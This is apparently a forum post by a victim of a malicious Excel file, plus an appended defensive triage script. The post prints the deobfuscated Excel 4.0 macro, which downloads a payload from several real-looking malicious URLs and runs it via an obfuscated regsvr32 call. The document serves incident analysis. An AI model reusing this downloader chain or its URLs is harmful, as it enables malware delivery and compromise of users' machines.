Long story short, got duped into opening an XLSM in Excel, with macros being enabled. Realised instantly.
Dug into the Excel structure, found the following (extremely obfuscated) payload:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/l55mri/Pl9TE5LYUHTCpuglHEkP/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/l55mri/Pl9TE5LYUHTCpuglHEkP/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/ofoed/ZHGzF/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/wp-content/Gzza9KkuuCa/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/portal/e6Ga3Y9/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XFRV7L84/Gtb9BR0M/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
When accessed, the malicious URLs contain the following contents:
- onlinebrandedcontent: Standard Apache file index page with no contents
- onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or Javascript.
- marcoantonioguerrerafitness/acceptanceh/gloselweb: Presumably malicious DLL file
I located enu.ocx on my machine. Creation timestamp is correct, ~5kb file size. To my relief, the contents are identical to the onlyfansgo "Account Suspended" HTML file.
So, on the surface of it, it looks like the macro got as far as the onlyfansgo HTML file instead of the malicious DLL payload, and then presumably tried to execute it using regsvr32.exe (which would have failed).
My question: Is it likely I dodged a bullet? And if so, why did the macro stop at the HTML file instead of continuing to the other malicious URLs (i.e. what in that urlmon call below would have assumed the HTML file was a valid payload, but not the earlier onlinebrandedcontent Apache index HTML)?
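An added triage script, not part of the post above, that shows how a defender would read this Excel 4.0 macro chain: it joins the "r"&"eg"&"sv"&"r32.exe" string splicing, pulls the download URLs, drop path and EXEC command out of the formulas, and models the IF(<0, ...) fallback, in which each CALL only runs if the previous URLDownloadToFile returned a negative HRESULT (urlmon reports success for any completed HTTP response, whether the body is a DLL or an HTML page). The sample formulas are constructed to mirror the posted macro's structure with placeholder hosts, and the HRESULT values fed to first_accepted are assumed outcomes, not observed ones.

```python
import re

# Constructed sample that mirrors the structure of the posted XLM macro;
# hosts are placeholders, not the indicators from the post.
SAMPLE_FORMULAS = [
    '=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://host-a.example.invalid/p1/","..\\enu.ocx",0,0)',
    '=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://host-b.example.invalid/p2/","..\\enu.ocx",0,0))',
    '=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://host-c.example.invalid/p3/","..\\enu.ocx",0,0))',
    '=IF(<0, CLOSE(0),)',
    '=EXEC("C:\\Windows\\SysWow64\\r"&"eg"&"sv"&"r32.exe /s ..\\enu.ocx")',
    '=RETURN()',
]

STRING_LITERAL = re.compile(r'"([^"]*)"')

def unsplice(formula):
    # Join "a"&"b" concatenations, the trick the posted EXEC line uses to hide "regsvr32".
    return re.sub(r'"\s*&\s*"', '', formula)

def triage(formulas):
    """Extract the download chain, drop path(s) and EXEC command from XLM formulas."""
    report = {"downloads": [], "drop_paths": [], "exec": []}
    for raw in formulas:
        f = unsplice(raw)
        lits = STRING_LITERAL.findall(f)
        # CALL("urlmon", "URLDownloadToFil...", typestr, pCaller, URL, localfile, reserved, callback);
        # the export is matched by prefix because the post spells it "URLDownloadToFilA".
        if "CALL(" in f and "urlmon" in lits and any(l.startswith("URLDownloadToFil") for l in lits):
            url = next(l for l in lits if l.startswith(("http://", "https://")))
            report["downloads"].append(url)
            report["drop_paths"].append(lits[lits.index(url) + 1])  # local file follows the URL
        if f.startswith("=EXEC("):
            report["exec"].append(lits[0])
    report["regsvr32_lolbin"] = any("regsvr32" in c.lower() for c in report["exec"])
    return report

def first_accepted(urls, hresults):
    """Model the IF(<0, ...) fallback: the chain stops at the first URL whose
    URLDownloadToFile HRESULT is non-negative. A 200 response with an HTML body
    is non-negative just like a real DLL, so it is 'accepted' and handed to EXEC.
    A URL missing from hresults is treated as a failed (negative) call."""
    for url in urls:
        if hresults.get(url, -1) >= 0:
            return url
    return None

if __name__ == "__main__":
    r = triage(SAMPLE_FORMULAS)
    print(r)
    # Assumed outcomes: host-a fails with a negative HRESULT, host-b answers 200 with an HTML page.
    print(first_accepted(r["downloads"], {r["downloads"][0]: -2146697211, r["downloads"][1]: 0}))
```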